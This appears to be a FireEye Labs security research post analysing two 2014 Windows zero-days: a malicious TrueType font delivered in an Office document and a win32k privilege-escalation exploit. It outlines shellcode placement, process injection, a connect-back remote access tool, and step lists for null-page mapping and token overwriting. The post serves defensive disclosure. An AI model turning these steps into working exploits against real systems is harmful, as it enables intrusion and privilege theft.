In the case of CVE-2014-4148, the attackers exploited a vulnerability in the Microsoft Windows TrueType Font (TTF) processing subsystem, using a Microsoft Office document to embed and deliver a malicious TTF to an international organization. Since the embedded TTF is processed in kernel-mode, successful exploitation granted the attackers kernel-mode access. Though the TTF is delivered in a Microsoft Office document, the vulnerability does not reside within Microsoft Office.

CVE-2014-4148 impacted both 32-bit and 64-bit Windows operating systems shown in MS14-058, though the attacks only targeted 32-bit systems. The malware contained within the exploit has specific functions adapted to the following operating system platform categories:

  • Windows 8.1/Windows Server 2012 R2
  • Windows 8/Windows Server 2012
  • Windows 7/Windows Server 2008 R2 (Service Pack 0 and 1)
  • Windows XP Service Pack 3

CVE-2014-4113 rendered Microsoft Windows 7, Vista, XP, Windows 2000, Windows Server 2003/R2, and Windows Server 2008/R2 vulnerable to a local Elevation of Privilege (EoP) attack. This means that the vulnerability cannot be used on its own to compromise a customer’s security. An attacker would first need to gain access to a remote system running any of the above operating systems before they could execute code within the context of the Windows Kernel. Investigation by FireEye Labs has revealed evidence that attackers have likely used variations of these exploits for a while. Windows 8 and Windows Server 2012 and later do not have these same vulnerabilities.

Information on the companies affected, as well as threat actors, is not available at this time. We have no evidence of these exploits being used by the same actors. Instead, we have only observed each exploit being used separately, in unrelated attacks.


About CVE-2014-4148





Microsoft has released security update MS14-058 that addresses CVE-2014-4148.

Since TTF exploits target the underlying operating system, the vulnerability can be exploited through multiple attack vectors, including web pages. In the past, exploit kit authors have converted a similar exploit (CVE-2011-3402) for use in browser-based attacks. More information about this scenario is available under Microsoft’s response to CVE-2011-3402: MS11-087.




This TTF exploit is packaged within a Microsoft Office file. Upon opening the file, the font will exploit a vulnerability in the Windows TTF subsystem located within the win32k.sys kernel-mode driver.

The attacker’s shellcode resides within the Font Program (fpgm) section of the TTF. The font program begins with a short sequence of instructions that quickly return. The remainder of the font program section is treated as unreachable code for the purposes of the font program and is ignored when initially parsing the font.

During exploitation, the attacker’s shellcode uses Asynchronous Procedure Calls (APC) to inject the second stage from kernel-mode into the user-mode process winlogon.exe (in XP) or lsass.exe (in other OSes). From the injected process, the attacker writes and executes a third stage (executable).

The third stage decodes an embedded DLL to, and runs it from, memory. This DLL is a full-featured remote access tool that connects back to the attacker.

Plenty of evidence supports the attacker’s high level of sophistication. Beyond the fact that the attack is zero-day kernel-level exploit, the attack also showed the following:

  • a usable hard-coded area of kernel memory is used like a mutex to avoid running the shellcode multiple times
  • the exploit has an expiration date: if the current time is after October 31, 2014, the exploit shellcode will exit silently
  • the shellcode has implementation customizations for four different types of OS platforms/service pack levels, suggesting that testing for multiple OS platforms was conducted
  • the dropped malware individually decodes each string when that string is used to prevent analysis
  • the dropped malware is specifically customized for the targeted environment
  • the dropped remote access capability is full-featured and customized: it does not rely on generally available implementations (like Poison Ivy)
  • the dropped remote access capability is a loader that decrypts the actual DLL remote access capability into memory and never writes the decrypted remote access capability to disk


About CVE-2014-4113





Microsoft has released security update MS14-058 that addresses this vulnerability.


Vulnerability and Exploit Details


The 32-bit exploit triggers an out-of-bounds memory access that dereferences offsets from a high memory address, and inadvertently wraps into the null page. In user-mode, memory dereferences within the null page are generally assumed to be non-exploitable. Since the null page is usually not mapped – the exception being 16-bit legacy applications emulated by ntvdm.exe--null pointer dereferences will simply crash the running process. In contrast, memory dereferences within the null page in the kernel are commonly exploited because the attacker can first map the null page from user-mode, as is the case with this exploits. The steps taken for successful 32-bit exploitation are:



  1. Map the null page:




    1. ntdll!ZwAllocateVirtualMemory(…,BaseAddress=0x1, …)



  2. Build a malformed win32k!tagWND structure at the null page such that it is properly validated in the kernel
  3. Trigger vulnerability
  4. Attacker’s callback in win32k!tagWND.lpfnWndProc executes in kernel-mode




    1. Callback overwrites EPROCESS.Token to elevate privileges



  5. Spawns a child process that inherits the elevated access token


32-bit Windows 8 and later users are not affected by this exploit. The Windows 8 Null Page protection prohibits user-mode processes from mapping the null page and causes the exploits to fail.

In the 64-bit version of the exploit, dereferencing offsets from a high 32-bit memory address do not wrap, as it is well within the addressable memory range for a 64-bit user-mode process. As such, the Null Page protection implemented in Windows versions 7 (after MS13-031) and later does not apply. The steps taken by the 64-bit exploit variants are:



  1. Map memory page:




    1. ntdll!ZwAllocateVirtualMemory(…)



  2. Build a malformed win32k!tagWND structure at the mapped page such that it is properly validated in the kernel
  3. Trigger vulnerability
  4. Attacker’s callback in win32k!tagWND.lpfnWndProc executes in kernel-mode




    1. Callback overwrites EPROCESS.Token to elevate privileges



  5. Spawns a child process that inherits the elevated access token


64-bit Windows 8 and later users are not affected by this exploit. Supervisor Mode Execution Prevention (SMEP) blocks the attacker’s user-mode callback from executing within kernel-mode and causes the exploits to fail.


Exploits Tool History


The exploits are implemented as a command line tool that accepts a single command line argument – a shell command to execute with SYSTEM privileges. This tool appears to be an updated version of an earlier tool. The earlier tool exploited CVE-2011-1249, and displays the following usage message to stdout when run:


Usage:system_exp.exe cmd



Windows Kernel Local Privilege Exploits


The vast majority of samples of the earlier tool have compile dates in December 2009.  Only two samples were discovered with compile dates in March 2011. Although the two samples exploit the same CVE, they carry a slightly modified usage message of:


Usage:local.exe cmd



Windows local Exploits


The most recent version of the tool, which implements CVE-2014-4113, eliminates all usage messages.

The tool appears to have gone through at least three iterations over time. The initial tool and exploits is believed to have had limited availability, and may have been employed by a handful of distinct attack groups. As the exploited vulnerability was remediated, someone with access to the tool modified it to use a newer exploit when one became available. These two newer versions likely did not achieve the widespread distribution that the original tool/exploits did and may have been retained privately, not necessarily even by the same actors.

We would like to thank Barry Vengerik, Joshua Homan, Steve Davis, Ned Moran, Corbin Souffrant, Xiaobo Chen for their assistance on this research.
